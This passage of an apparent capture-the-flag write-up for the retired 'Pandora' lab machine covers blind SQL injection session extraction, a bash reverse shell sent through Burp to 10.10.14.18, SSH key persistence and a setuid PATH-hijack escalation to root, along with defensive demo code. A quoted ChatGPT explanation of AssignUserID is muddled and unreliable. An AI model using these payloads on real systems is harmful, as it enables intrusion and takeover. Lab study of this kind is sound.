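def blind_extract_session(db: sqlite3.Connection, user: str, length: int = 26) -> str:
    """Boolean-based blind extraction, the technique sqlmap reported above.
    Whether any row matched changes the response, which is a one-bit oracle;
    compare one character at a time until the whole id is known."""
    pattern = '%"' + user + '"%'
    recovered = ""
    for pos in range(1, length + 1):
        for c in ALPHABET:
            probe = (f"' OR (SELECT substr(id_session,{pos},1) FROM tsessions_php "
                     f"WHERE data LIKE '{pattern}') = '{c}' -- ")
            if load_session_vulnerable(db, probe) is not None:
                recovered += c
                break
        else:
            break  # no candidate matched: the id is shorter than expected
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup:", user_from_session(load_session_vulnerable(db, TAKEOVER)))
    print("fixed lookup:     ", user_from_session(load_session_fixed(db, TAKEOVER)))
    print("blind extraction: ", blind_extract_session(db, "matt"))
```

Two things carry over to the real target. The takeover payload is what makes a single request worth an admin session, which is why sqlmap's --dump was not strictly necessary once the injection was confirmed. And the extraction loop is a few hundred requests for one 26-character id; the pattern (many near-identical requests to chart_generator.php with differing session_id values, each logged by Apache under the vhost) is the signature to hunt for in access logs.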


Privilege Escalation & Reverse Shell through Burp

First we needed to configure Burp: the browser sends its requests to Burp's listener, and Burp in turn has to be told to send its outbound traffic through the SOCKS proxy on 127.0.0.1:9050 (the SOCKS proxy setting under Burp's connection settings), otherwise requests for localhost would hit the attack host instead of the target.


Once authenticated as matt, whose session has enough privilege for this, we got remote code execution through Pandora's event responses. An event response is a server-side command that an operator can trigger from the Events page, so this is the application running a command on purpose rather than an injection bug; the bug is only that we are matt without knowing matt's password. We captured the POST that the Events page sends when a response is executed and replaced the target parameter with a reverse shell (note the URL encoding: %26 for &), which runs as the vhost's user, matt, because of the AssignUserID directive seen earlier. Here is the POST request used in Burp.

POST /pandora_console/ajax.php HTTP/1.1
Host: localhost
Content-Length: 78
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="104"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: https://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost/pandora_console/index.php?sec=eventos&sec2=operation/events/events
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=g4e01qdgk36mfdh90hvcc54umq
Connection: close
 
page=include/ajax/events&perform_event_response=10000000&target=bash+-c+"bash+-i+>%26+/dev/tcp/10.10.14.18/1234+0>%261"&response_id=1        

We got a shell:

matt@pandora:/var/www/pandora/pandora_console$         

We generated an ssh key using:

ssh-keygen        

On the target, append the contents of id_rsa.pub (the public key) to /home/matt/.ssh/authorized_keys, creating .ssh with mode 700 if it does not exist and keeping authorized_keys at 600. The private key (id_rsa) is what we connect with: since the pair was generated on the target, cat it and copy it to the attack host. OpenSSH refuses to use a private key that other users can read, so set its permissions to 600 (no sudo is needed for a file you own):

chmod 600 <nameofKeyFile>

Once the permissions are set we can connect with the key alone:

ssh -i <nameofKeyFile> matt@<ipAddressOfTarget>

Escalation To Root

We discovered a setuid binary called pandora_backup at:

/usr/bin/pandora_backup

Its printable strings show what it does:

PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*
Backup failed!
Check your permissions!
Backup successful!
Terminating program

The binary runs tar by its bare name, so the shell it spawns resolves tar through the caller's PATH. Because pandora_backup is setuid root, whoever controls PATH controls which tar runs as root: a classic PATH hijack. We created a file named tar in /tmp that is really a shell script, put /tmp at the front of PATH, and ran pandora_backup by its absolute path. Two practical caveats: if the shell you get is still matt rather than root, the binary only has an effective uid of 0 and bash drops it at start-up, so use bash -p in the fake tar; and delete /tmp/tar afterwards so that nobody else on the box runs it by accident. See the commands run below:

matt@pandora:/tmp$ cat tar
 
#!/bin/bash
 
bash
 
matt@pandora:/tmp$ chmod +x tar 
matt@pandora:/tmp$ export PATH=/tmp:$PATH
matt@pandora:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
matt@pandora:/tmp$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:/tmp#         

This did not work from the shell spawned by the web server; the same steps run from the SSH session as matt gave root. Looking at the vhost configuration and the binary's permissions as root explains both why the web shell ran as matt and why the escalation needed SSH:
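An added Python example, not from the post, that stages stand-ins for /usr/bin and /tmp inside a temporary directory and shows how a bare command name resolves before and after PATH is prepended, and why a lookup that ignores the caller's PATH is immune. The fake tar here only echoes a string and nothing is setuid, so it is safe to run anywhere; the TRUSTED_DIRS list assumes a Debian/Ubuntu layout.

```python
import os
import shutil
import subprocess
import tempfile
from typing import Dict, Optional

# Directories a privileged program may trust for command lookup (Debian/Ubuntu
# layout assumed). The caller's $PATH is never consulted.
TRUSTED_DIRS = ("/usr/local/sbin", "/usr/local/bin", "/usr/sbin", "/usr/bin", "/sbin", "/bin")


def resolve(cmd: str, path_env: str) -> Optional[str]:
    """The lookup system()/execvp() perform for a bare name such as the `tar`
    inside pandora_backup: the first executable match in PATH wins."""
    return shutil.which(cmd, path=path_env)


def resolve_trusted(cmd: str, trusted_dirs=TRUSTED_DIRS) -> Optional[str]:
    """Hardened lookup: search a fixed list, never the environment's PATH.
    Equivalent in effect to calling /usr/bin/tar by absolute path."""
    return shutil.which(cmd, path=os.pathsep.join(trusted_dirs))


def _script(directory: str, name: str, body: str) -> str:
    path = os.path.join(directory, name)
    with open(path, "w") as fh:
        fh.write(body)
    os.chmod(path, 0o755)
    return path


def demo() -> Dict[str, object]:
    """Stage stand-ins for /usr/bin and /tmp and compare how `tar` resolves
    before and after PATH is prepended, exactly as in the transcript above."""
    with tempfile.TemporaryDirectory() as root:
        sysdir = os.path.join(root, "usr", "bin")
        tmpdir = os.path.join(root, "tmp")
        os.makedirs(sysdir)
        os.makedirs(tmpdir)
        real_tar = _script(sysdir, "tar", "#!/bin/sh\necho real tar\n")
        # The attacker's tar in the transcript runs `bash`; this one only
        # prints, so the demo never opens an interactive shell.
        fake_tar = _script(tmpdir, "tar", "#!/bin/sh\necho hijacked\n")

        clean_path = sysdir                           # PATH before the attack
        hijacked_path = tmpdir + os.pathsep + sysdir  # export PATH=/tmp:$PATH

        try:
            # What a system("tar ...") call sees: /bin/sh resolving the bare
            # name through the PATH it inherited from the caller.
            shell_out = subprocess.run("tar", shell=True, capture_output=True,
                                       text=True, env={"PATH": hijacked_path}).stdout.strip()
        except OSError:
            shell_out = "n/a"  # e.g. a noexec temporary filesystem

        return {
            "before_hijack_is_real": resolve("tar", clean_path) == real_tar,
            "after_hijack_is_fake": resolve("tar", hijacked_path) == fake_tar,
            # Same hijacked environment; the fixed-list lookup is unaffected.
            "trusted_lookup_is_real": resolve_trusted("tar", (sysdir,)) == real_tar,
            "shell_ran": shell_out,
        }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

The fix for a program like pandora_backup is the resolve_trusted behaviour: call helpers by absolute path or reset PATH to a known value before system(), and do not make the program setuid at all when a root cron job or a narrow sudo rule would do.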

root@pandora:/etc/apache2/sites-available# cat pandora.conf 
<VirtualHost localhost:80>
 ServerAdmin [email protected]
 ServerName pandora.panda.htb
 DocumentRoot /var/www/pandora
 AssignUserID matt matt
 <Directory /var/www/pandora>
  AllowOverride All
 </Directory>
 ErrorLog /var/log/apache2/error.log
 CustomLog /var/log/apache2/access.log combined
</VirtualHost>
root@pandora:/etc/apache2/sites-available# ls -la /usr/bin/pandora_backup 
-rwsr-x--- 1 root matt 16816 Dec 3 2021 /usr/bin/pandora_backup

The AssignUserID matt matt directive in the given <VirtualHost> block restricts the suid binary /usr/bin/pandora_backup in the following way:

The AssignUserID directive assigns the user matt and the group matt to the virtual host. This means that any files created or modified by the web server on behalf of the virtual host will be owned by the matt user and group.

The ls -la command shows that the /usr/bin/pandora_backup binary has the suid permission set, which means that it will be executed with the permissions of the file's owner (in this case, the root user) rather than the permissions of the user who runs the binary.

However, because the AssignUserID directive assigns the matt user and group to the virtual host, the web server will not be able to access the /usr/bin/pandora_backup binary with the root user's permissions. Instead, it will be forced to access the binary with the matt user's permissions, which are less privileged.

This restriction can help prevent the web server from accidentally or maliciously using the /usr/bin/pandora_backup binary in a way that could compromise the security of the system. It also ensures that any actions taken by the binary on behalf of the virtual host are restricted to the permissions of the matt user, rather than being able to execute with the more privileged root user's permissions.

(Defined by ChatGPT)
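To turn the explanation above into something a defender can check, here is an added example (not code from the original writeup or from Pandora FMS) that reads the AssignUserID identity out of a vhost file like pandora.conf and lists which root-owned SUID binaries that user and group are allowed to execute. The vhost text and every ls -la line except the pandora_backup one are constructed for the example.

```python
import re

# Constructed copy of the vhost file shown above (ServerAdmin omitted) plus
# constructed ls -la lines; only the pandora_backup line comes from the box.
PANDORA_CONF = """<VirtualHost localhost:80>
 ServerName pandora.panda.htb
 DocumentRoot /var/www/pandora
 AssignUserID matt matt
 <Directory /var/www/pandora>
  AllowOverride All
 </Directory>
</VirtualHost>
"""

LS_LINES = [
    "-rwsr-x--- 1 root matt 16816 Dec 3 2021 /usr/bin/pandora_backup",
    "-rwsr-xr-x 1 root root 40000 Jan 1 2021 /usr/local/bin/demo_tool",
    "-rwsr-x--- 1 root daemon 40000 Jan 1 2021 /usr/local/sbin/other_tool",
    "-rwxr-xr-x 1 root root 40000 Jan 1 2021 /usr/local/bin/plain_tool",
]

def vhost_identities(conf_text):
    """Map ServerName -> (user, group) for every vhost carrying AssignUserID."""
    ids = {}
    for body in re.findall(r"<VirtualHost[^>]*>(.*?)</VirtualHost>", conf_text, re.S):
        name = re.search(r"^\s*ServerName\s+(\S+)", body, re.M)
        ident = re.search(r"^\s*AssignUserID\s+(\S+)\s+(\S+)", body, re.M)
        if ident:
            ids[name.group(1) if name else "(unnamed)"] = (ident.group(1), ident.group(2))
    return ids

def parse_ls_line(line):
    """Split one 'ls -la' line into (mode, owner, group, path)."""
    mode, _links, owner, group, _size, _mon, _day, _time, path = line.split(maxsplit=8)
    return mode, owner, group, path

def reachable_suid_root(ls_lines, user, group):
    """Return [(path, reason)] for root-owned SUID files that user/group may execute."""
    hits = []
    for line in ls_lines:
        mode, owner, grp, path = parse_ls_line(line)
        if owner != "root" or mode[3] not in "sS":
            continue  # not a root-owned SUID file, so no privilege boundary here
        if mode[9] in "xt":
            hits.append((path, "world-executable"))
        elif grp == group and mode[6] in "xs":
            hits.append((path, f"executable by group {group}"))
    return hits
```

For the matt:matt identity the audit reports pandora_backup as executable by group matt and demo_tool as world-executable, while other_tool (group daemon) stays out of reach; running the same check with a generic www-data identity leaves only the world-executable file.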

Kudos to OpenAI and ChatGPT for the Explanations

Great job OpenAI team! ChatGPT is a high quality learning companion. I found, in the process of making this writeup and conducting the live stream, that ChatGPT was able to explain concepts more concisely than I could myself. It taught me something about Apache configuration files. I am looking forward to what the future brings and what these tools enable us humans to learn, teach & create.

Keep Learning!

P.S. The original live stream that inspired this post is on Twitch https://www.twitch.tv/videos/1674667401

Learning Objectives:

  • IP Addressing
  • Enumeration with Nmap
  • TCP & UDP
  • Linux
  • SNMP
  • Authentication
  • SSH & Dynamic port forwarding
  • SSH key-based authentication
  • Bash scripting
  • Linux Command Line Navigation
  • Documentation
  • ChatGPT as a learning companion
  • Apache virtual hosts
  • Subdomain enumeration
  • Linux Privilege Escalation
  • Pivoting & Proxy chaining
  • SOCKS Proxies
  • Configuring Foxy Proxy
  • Working with Burp Suite Community Edition
  • Researching CVEs
  • Database Enumeration
  • SQL Injection (Automated & Manual)
  • SQLMap
  • Web application penetration testing
  • Session IDs associated with web login sessions
  • Reverse Shells
  • Linux File Permissions
  • Path Hijacking
  • Absolute and relative paths

Stanley Russel

Engineer & Manufacturer | Internet Bonding routers to Video Servers | Network equipment production | ISP Independent IP address provider | Customized Packet level Encryption & Security | On-premises Cloud

1 year

Wow, great writeup! I really appreciate that you used ChatGPT for written documentation and explanations. It's a great tool for learning, and especially for ethical hacking. I'm sure you learned a lot from working on the retired machine Pandora, too. Keep up the great work!

Cesar Salinas

IT Service Desk Engineer | Information Security Enthusiast

2 years

Great writeup! AI is here like we've never seen before and we are living in the future

Jan B.

Polymath* Public Relations Parrotsec

2 years
